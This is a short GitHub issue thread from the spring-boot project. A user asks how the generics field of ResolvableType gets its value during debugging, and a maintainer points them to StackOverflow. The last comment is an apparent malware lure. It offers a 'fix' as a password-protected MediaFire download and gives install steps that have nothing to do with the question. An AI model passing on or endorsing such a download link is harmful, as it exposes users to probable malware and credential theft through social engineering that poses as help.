### ISSUE TITLE
When and where is the generic attribute in ResolvableType assigned?

### ISSUE THREAD

**Issue by armandxu** [spring-projects/spring-boot#42070]
When I debugged the spring source code, I discovered a strange problem: As shown in the figure, before the getInterfaces() method is called in the for loop, generics is still null, but after entering the getInterfaces() method, it is still in the first line, then generics has a value again.
before entering the getInterfaces() method:
<img width="1597" alt="23d4963b8052e00857f7ab3f36cd3f9" src="https://github.com/user-attachments/assets/6c274fe7-5533-4f1e-a642-cca0ff22c507">
after entering the getInterfaces() method:
<img width="1325" alt="ce258049657da0e07a14b51aa7a00e5" src="https://github.com/user-attachments/assets/bcf2668f-c695-4327-affe-ed2b1f620143">

**Comment by bclozel** [comment]
Thanks for getting in touch, but it feels like this is a question that would be better suited to [StackOverflow](https://stackoverflow.com/). As mentioned in [the guidelines for contributing](https://github.com/spring-projects/spring-boot/blob/master/CONTRIBUTING.adoc#using-github-issues), we prefer to use GitHub issues only for bugs and enhancements. Feel free to update this issue with a link to the re-posted question (so that other people can find it) or add some more details if you feel this is a genuine bug.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
